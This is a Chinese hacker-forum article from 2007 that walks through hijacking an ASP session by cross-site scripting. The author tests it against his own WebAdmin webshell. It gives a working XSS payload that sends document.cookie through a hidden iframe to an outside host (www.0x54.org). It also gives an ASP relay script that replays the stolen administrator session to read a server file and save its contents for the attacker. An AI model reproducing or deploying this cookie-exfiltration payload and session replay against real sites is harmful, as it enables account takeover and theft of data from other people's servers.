黑客风云——风云网络
设为首页 加入收藏 我要投稿 网站地图
您现在的位置: 黑客风云 >> 黑客文章 >> 黑客进阶 >> 黑客入侵 >> 文章正文
[组图]跨站实现HTTP会话劫持
        ★★★★★
跨站实现HTTP会话劫持
文章整理发布:黑客风云 文章来源:www.05112.com 更新时间:2007-11-10

Web应用程序是通过2种方式来判断和跟踪不同用户的:Cookie或者Session(也叫做会话型Cookie)。其中Cookie是存储在本地计算机上的,过期时间很长,所以针对Cookie攻击手段一般是盗取用户Cookie然后伪造Cookie冒充该用户;而Session由于其存在于服务端,随着会话的注销而失效(很快过期),往往难于利用。所以一般来说Session认证较之Cookie认证安全

当然啦,Session难于利用并不等于不能利用,本文将通过一个小小的例子实现一次简单的HTTP会话劫持。

还是以ASP为例,ASP程序是如何得到客户端Session的呢?通过抓包可以发现HTTP请求的Cookie字段有个ASPSESSIONIDXXXXXXXXX是随机的字母)值,ASP程序就是通过这个值判断Session的。如果我们得到管理员的ASPSESSIONIDXXXXXXXX及其值,并在这次会话结束之前提交到服务器,那么我们的身份就是管理员啦!

 

那怎么得到Session呢?答案是跨站。因为JavaScriptdocument.cookie()方法会把Cookie读出来,当然也包括会话型Cookie

 

如果你关注Web安全,相信你一定看到过记录跨站得到Cookie的脚本程序,我们也需要一个类似的程序,但功能不是记录,而是立即转发(因为当前会话随时可能由于管理员退出而失效)。这个程序可以用ASPPHPPerl甚至C来实现,我还是用ASP

 

要写这个程序,你还必须对要攻击的程序相当了解,因为你要提交各种请求。那现在先看看本例中被跨站的程序吧。

 

很荣幸,我选中了WebAdmin 1.4,嘿嘿,自己写的程序自己肯定最清楚哪里有漏洞啊。呵呵,简要介绍一下,WebAdmin是一个ASP.Net下的webshell,使用的Session认证方式,1.4版本的跨站存在于目录浏览的URL(图1)。

 

 

所以我就在src中构造这样的路径:

以下是引用片段:<script>a='<iframe width=0 height=0 src=http://www.0x54.org/test/cc.asp?a=';a%2B=escape(document.cookie);a%2B='></iframe>';document.write(a);</script>

这段代码就是把当前cookie作为参数提交给www.0x54.org/test/cc.asp文件。

cc.asp文件内容如下:

以下是引用片段:

<%

'only for test with CSS

str = request("a")

Set xPost = CreateObject("Msxml2.ServerXMLHTTP")

xPost.Open "GET", "http://222.210.115.125:813/webadmin.aspx?action=edit&src=E:\MyWeb\webadmin.aspx", False

xPost.setRequestHeader "Cookie",str

xPost.Send()

         Set sGet = CreateObject("ADODB.Stream")

         sGet.Mode = 3

         sGet.Type = 1

         sGet.Open()

         sGet.Write(xPost.responseBody)

         sGet.SaveToFile Server.MapPath("a.txt"),2

         set sGet = nothing

Set xPOST=nothing

%>

 

该文件目的是获取管理员Session并利用WebAdmin的文件编辑功能查看222.210.115.125(被攻击Web服务器,其实是我本机啦)的E:\MyWeb\webadmin.aspx文件内容并把内容保存到本地的a.txt文件中。数据的提交使用的是ServerXMLHTTP组件,它与XMLHTTP有相似之处,也有异同,具体的可以看看《ServerXMLHTTP vs XMLHTTP》。

 

准备就绪,先登陆WebAdmin然后再访问构造好的跨站URL,呵呵,然后去看http://www.0x54.org/test/a.txt,得到内容如下图所示:

 

 

你也可以试试直接访问cc.asp,呵呵,生成的a.txt将是一个登陆界面的源文件。

哈哈,现在热烈庆祝一下本次HTTP会话劫持测试胜利闭幕,总的来说实行一次这样的攻击难度还是很大的,不过话又说回来,在技术这块领域,除了Copy人家的代码,还有不需要努力就能做好的事情吗?

文章录入:cainiaowang    责任编辑:cainiaowang 
  • 上一篇文章:

  • 下一篇文章: 没有了
  • 【字体: 】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
    VIP 专 区
    Copyright @2006 黑客风云 ●业务联系:QQ 联系怪人 联系奇人 Email:给怪人发邮件 给奇人发邮件
    ICP备案:冀06009886